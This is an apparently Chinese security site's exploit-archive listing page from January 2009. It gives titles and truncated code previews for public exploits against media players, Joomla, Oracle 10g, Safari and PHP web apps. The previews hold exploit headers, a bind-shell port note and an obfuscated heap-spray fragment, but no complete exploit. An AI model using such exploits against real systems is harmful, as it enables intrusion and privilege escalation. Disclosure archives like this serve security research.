首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC
  日期:2009-01-08 12:27:31 点击:33 评论:0
#!/usr/bin/perl # WinAmp GEN_MSN Plugin Heap Buffer Overflow # ------------------------------------ # Discovered by SkD (skdrat@hotmail.com) # (skd@abysssec.com) # ------------------------------------ # # I'm not much for posting PoCs because # I lik
VUPlayer <= 2.49 .PLS Universal Buffer Overflow Exploit
  日期:2009-01-08 12:26:51 点击:27 评论:0
#!/usr/bin/perl # VUPlayer = 2.49 .PLS Universal Buffer Overflow Exploit # ------------------------------------------------------- # Discovered Exploit by SkD (skdrat@hotmail.com) # (skd@abysssec.com) # -----------------------------------------------
Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit
  日期:2009-01-08 12:26:02 点击:42 评论:0
#usage: exploit.py print ************************************************************************** print Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploitn print Author: Mountassif Moad print the best: Evil finger v4 Team print Tested on:
Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC
  日期:2009-01-08 12:24:33 点击:22 评论:0
#!/bin/perl # LiteServe 2.81 Remote buffer overflow Poc (user) # download : http://www.cmfperception.com/liteserve/pls2_81.exe # ------------------------------------- # EAX 00000001 # ECX 7FFDF000 # EDX 41414155 # EBX 010ED8EC ASCII AAAAAAAAAAAA # ES
CoolPlayer BUILD 219 (PlaylistSkin) Buffer Overflow Exploit
  日期:2009-01-08 11:54:44 点击:23 评论:0
#!/usr/bin/perl # coolplayer_bof.pl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit # http://coolplayer.sourceforge.net # # TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING # # C:Docum
Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
  日期:2009-01-07 17:31:41 点击:51 评论:0
?php /* Joomla = 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability discovered by: irk4z[at]yahoo.pl greets: all friends ;) */ echo * Joomla = 1.5.8 (xstandard editor) Local Directory Traversal Vulnn; echo * discovered by: irk4z[at]yah
Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit
  日期:2009-01-07 17:30:55 点击:74 评论:0
#!perl -w # Simple overflow for Cain Abel v4.9.25 (and below?) # This script will output a file; import this file as a # config file under Cracker - Cisco IOS-MD5 Hashes # # If Cain crashes but calc.exe isn't run, change $eip to reflect # your system
CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
  日期:2009-01-07 10:01:23 点击:38 评论:0
#!/usr/bin/perl # coolplayer_bof.pl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit # http://coolplayer.sourceforge.net # # TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING # # C:Docu
VUPlayer version 2.49 local denial of service proof of concept exploit
  日期:2009-01-07 09:58:16 点击:22 评论:0
#!/usr/bin/perlsystem(color 3);if (@ARGV != 1) { help; exit(); }sub help(){print [X] Usage : ./exploit.pl filename n;}{ $file = $ARGV[0]; }print n [X]*******************************************n;print [X] VUPLAYER BufferOver flow POC *n;print [X
SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
  日期:2009-01-07 09:56:17 点击:21 评论:0
#!/usr/bin/perl # SeaMonkey = 1.1.14 (marquee) Denial of Service Exploit # by athos - staker[at]hotmail[dot]it # tested on ubuntu 8.10 / slackware 12.2 # thanks to SirDark because he has tested on slackware my $data = undef; my $file = shift or usage
Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit
  日期:2009-01-07 09:55:41 点击:26 评论:0
# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day) # By:Encrypt3d.M!nd # # Well,There is a buffer overflow in the program were all the supported types are # Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt
Goople <= 1.8.2 (frontpage.php) Blind SQL Injection Exploit
  日期:2009-01-07 09:54:49 点击:20 评论:0
#--+++=========================================================+++--# #--+++====== Goople = 1.8.2 Blind SQL Injection Exploit ======+++--# #--+++=========================================================+++--# #!/usr/bin/php ? function usage () { echo
Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability
  日期:2009-01-07 09:53:37 点击:39 评论:0
Package: xterm Version: 222-1etch2 Severity: grave Tags: security patch Justification: user security hole DECRQSS Device Control Request Status String DCS $ q simply echoes (responds with) invalid commands. For example, perl -e 'print eP$qnbad-com
RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
  日期:2009-01-07 09:52:57 点击:13 评论:0
?php /* $Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $ RiotPix = 0.61 (forumid) Blind SQL Injection Exploit Bug found Exploited by cOndemned Download : http://www.riotpix.com/download/riotpix0_61.zip Description : It's just simple Bl
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
  日期:2009-01-07 09:52:06 点击:44 评论:0
/*********************************************************/ /*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ /**grant DBA and create new OS user (using scheduller)***/ /*********************************************************/ /***
Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit
  日期:2009-01-07 09:51:04 点击:38 评论:0
/*********************************************************/ /*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ /****grant DBA and create new OS user (java)*************/ /*********************************************************/ /**********
Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit
  日期:2009-01-07 09:49:39 点击:56 评论:0
/*********************************************************/ /*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ /****grant DBA and create new OS user (advanced extproc)*/ /*********************************************************/ /**********
Safari (Arguments) Array Integer Overflow PoC (New Heap Spray)
  日期:2009-01-06 11:46:30 点击:182 评论:0
BODY CODE id=sploit status/CODE CODE id=heapspray status/CODE SCRIPT i=0;eval(unescape((g#M#g#@@g@#gMNM@MMM#MMMMgMMMMMMMMNMN@NNN#NNNNgNNNNNNMNNN@#gMN##MMggg@Ng#MNg#MN#N#M@M#gN#M#M#Mgg#M### g # #M NgN#Q gg#Mg#N @ # g##MNgg@ggg Mg#N@#NM#@ g##N
PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities
  日期:2009-01-06 11:45:51 点击:25 评论:0
######################### #PHPAuctionSystem# ######################### Author:x0r Email:andry2000@hotmail.it Cms:PhpAuctionSystemvnew Cmsprice:$59.99 Demo:http://www.phpauctions.info/demo/ ########################## BugIn:profile.php(BlindNormal Sq
VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit
  日期:2009-01-06 11:45:13 点击:24 评论:0
#!/usr/bin/perl -w # Author : Houssamix # Download : http://vuplayer.com/files/vuplayersetup.exe # tested in windows pro Sp 2 (french) # -- Viva Gazza -- Viva Palestine -- print ===================================================================== n
共637页/12733条记录 首页 上一页 [487] [488] [489] 490 [491] [492] [493] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved